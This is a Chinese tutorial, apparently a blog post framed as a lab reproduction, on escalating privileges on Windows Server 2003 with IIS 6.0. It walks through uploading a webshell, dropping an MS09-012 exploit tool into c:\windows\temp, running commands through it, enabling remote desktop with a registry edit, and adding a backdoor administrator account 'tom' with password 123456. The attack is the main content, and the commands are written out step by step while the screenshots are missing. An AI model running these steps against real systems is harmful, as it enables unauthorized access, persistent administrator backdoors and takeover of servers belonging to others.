Windows2003系统漏洞提权复现

简介: 操作系统: Microsoft Windows Server 2003Web服务器: IIS V6.0第一步,将大马文件上传至服务器根目录

操作系统: Microsoft Windows Server 2003


Web服务器: IIS V6.0


第一步,将大马文件上传至服务器根目录


image.png


第二步,访问大马文件,进入大马的控制界面


image.pngimage.pngimage.png


第三步,查看漏洞补丁信息


image.png

第四步,上传漏洞工具


将提权工具( 此处使用MS09-012漏洞工具 )上传到系统中,windows系统的回收站和c:\windows\Temp目录默认具有上传和执行的权限


image.png


第五步,利用工具进行提权

payload

/c c:\windows\temp\pr.exe "whoami"

image.png

第六步,开启远程桌面端口

命令行查看是否开启3389( 远程桌面 )端口

/c c:\windows\temp\pr.exe "netstat -ano"

image.png

上传a.bat文件至c:\windows\temp目录下,内容为开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f


执行a.bat文件,开启3389端口

/c c:\windows\temp\pr.exe "c:\windows\temp\a.bat"

image.png

查看3389是否开启成功

/c c:\windows\temp\pr.exe "netstat -ano"

image.png


第七步,添加管理员权限用户


添加普通用户tom


/c c:\windows\temp\pr.exe "net user tom 123456 /add"

image.png 将tom添加至administrators,拥有管理员权限


/c c:\windows\temp\pr.exe "net localgroup administrators tom /add"

image.png

第八步,物理机连接远程桌面

image.png

image.png

image.png


相关文章
|
17天前
如何隐藏windows10系统任务栏右下角的语言输入法图标?
如何隐藏windows10系统任务栏右下角的语言输入法图标?
|
1月前
|
安全 Linux Shell
全面对比linux和windows,选择哪个系统比较好
全面对比linux和windows,选择哪个系统比较好
67 0
|
1月前
|
监控 Windows
Windows系统中Wireshark抓包工具的安装使用
Windows系统中Wireshark抓包工具的安装使用
|
2月前
|
存储 安全 Shell
windows 系统 c 盘 .ssh 文件夹里的 known_hosts 文件的作用
windows 系统 c 盘 .ssh 文件夹里的 known_hosts 文件的作用
69 0
|
2月前
|
安全 Shell 网络安全
windows 系统 c 盘 .ssh 文件夹里的 id_rsa 文件的作用
windows 系统 c 盘 .ssh 文件夹里的 id_rsa 文件的作用
40 0
|
2月前
|
安全 算法 网络安全
windows 系统 c 盘 .ssh 文件夹里的 id_rsa.pub 文件的作用
windows 系统 c 盘 .ssh 文件夹里的 id_rsa.pub 文件的作用
40 0
|
2天前
|
人工智能 安全 机器人
AI电销机器人系统源码部署:freeswitch安装Windows
在Windows上安装FreeSWITCH:访问官网下载安装程序,运行并按提示安装;选择安装路径和组件;等待安装完成;配置FreeSWITCH,修改设置;启动服务;测试其功能;如遇问题,参考官方文档或进行调试故障排除。记得定期更新维护以保证稳定安全。
|
5天前
|
网络协议 安全 测试技术
Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
Windows安装禅道系统结合Cpolar实现公网访问内网BUG管理服务
|
5天前
|
存储 安全 文件存储
Windows系统本地部署HFS并结合内网穿透实现公网访问本地存储文件
Windows系统本地部署HFS并结合内网穿透实现公网访问本地存储文件
Windows系统本地部署HFS并结合内网穿透实现公网访问本地存储文件
|
1月前
|
编译器 C语言 流计算
在Windows系统中创建C语言开发环境
【2月更文挑战第22天】在Windows系统中创建C语言开发环境
21 6